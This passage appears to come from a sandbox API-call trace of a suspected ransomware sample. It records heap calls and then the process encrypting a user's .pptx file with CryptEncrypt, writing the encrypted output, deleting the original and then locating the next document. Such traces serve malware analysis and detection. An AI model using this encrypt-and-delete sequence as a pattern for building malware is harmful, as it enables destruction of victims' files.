(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0077.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0077.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0077.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15fcc) returned 0x499a008 [0077.197] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0077.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0077.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0077.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0077.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43ca898 [0077.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca898, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0077.198] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x15fcc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x15fd0) returned 1 [0077.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0077.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9818 [0077.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0077.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0077.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0077.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0077.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0077.198] CharLowerBuffW (in: lpsz="byte[90065]", cchLength=0xb | out: lpsz="byte[90065]") returned 0xb [0077.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0077.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0077.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0077.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0077.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0077.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0077.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0077.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0077.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0077.201] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.201] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0077.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0077.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0077.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0077.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43caad8 [0077.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caad8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0077.202] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144e790*=0x15fcc, dwBufLen=0x15fd0 | out: pbData=0x499a008*, pdwDataLen=0x144e790*=0x15fd0) returned 1 [0077.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0077.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9a40 [0077.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0077.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0077.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0077.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0077.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0077.202] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.202] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.203] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.204] WriteFile (in: hFile=0x298, lpBuffer=0x49affe0*, nNumberOfBytesToWrite=0x15fd0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49affe0*, lpNumberOfBytesWritten=0x144f194*=0x15fd0, lpOverlapped=0x0) returned 1 [0077.207] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0077.207] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.207] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0077.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0077.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0077.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca508, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0077.207] CryptDestroyKey (hKey=0x41ac600) returned 1 [0077.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0077.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0077.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0077.208] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.208] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.208] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.208] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.208] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.208] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.208] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.208] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.208] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0077.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0077.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0077.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0077.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0077.208] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0077.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0077.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0077.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0077.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.209] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.209] FreeLibrary (hLibModule=0x756e0000) returned 1 [0077.209] CloseHandle (hObject=0x258) returned 1 [0077.209] CloseHandle (hObject=0x298) returned 1 [0077.217] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\nDdxnatd.pptx", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\nDdxnatd.pptx", lpFilePart=0x0) returned 0x27 [0077.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0077.217] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\nDdxnatd.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\nddxnatd.pptx")) returned 0x20 [0077.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0077.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0077.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0077.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a138 | out: hHeap=0x1780000) returned 1 [0077.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0077.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0077.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0077.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0077.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0077.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0077.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0077.218] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\nDdxnatd.pptx", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39980a90, ftCreationTime.dwHighDateTime=0x1d5d762, ftLastAccessTime.dwLowDateTime=0x4e494740, ftLastAccessTime.dwHighDateTime=0x1d5d0de, ftLastWriteTime.dwLowDateTime=0x4e494740, ftLastWriteTime.dwHighDateTime=0x1d5d0de, nFileSizeHigh=0x0, nFileSizeLow=0x15fcc, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="nDdxnatd.pptx", cAlternateFileName="NDDXNA~1.PPT")) returned 0x41ac700 [0077.218] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\nDdxnatd.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\nddxnatd.pptx")) returned 1 [0077.223] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39980a90, ftCreationTime.dwHighDateTime=0x1d5d762, ftLastAccessTime.dwLowDateTime=0x4e494740, ftLastAccessTime.dwHighDateTime=0x1d5d0de, ftLastWriteTime.dwLowDateTime=0x4e494740, ftLastWriteTime.dwHighDateTime=0x1d5d0de, nFileSizeHigh=0x0, nFileSizeLow=0x15fcc, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="nDdxnatd.pptx", cAlternateFileName="NDDXNA~1.PPT")) returned 0 [0077.223] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0077.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0077.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0077.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0077.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0077.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0077.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0077.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0077.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0077.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0077.230] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0077.230] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0077.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0077.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0077.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0077.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7ef0 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c98f0 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0077.232] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0077.232] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0077.232] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0077.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0077.233] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.233] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\NHgtkAPLnX.docx", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4814be60, ftCreationTime.dwHighDateTime=0x1d59a5e, ftLastAccessTime.dwLowDateTime=0x7b674560, ftLastAccessTime.dwHighDateTime=0x1d575df, ftLastWriteTime.dwLowDateTime=0x7b674560, ftLastWriteTime.dwHighDateTime=0x1d575df, nFileSizeHigh=0x0, nFileSizeLow=0x7490, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="NHgtkAPLnX.docx", cAlternateFileName="NHGTKA~1.DOC")) returned 0x41ac440 [0077.233] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0077.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0077.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0077.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0077.233] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0077.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0077.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0077.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0077.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0077.234] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: 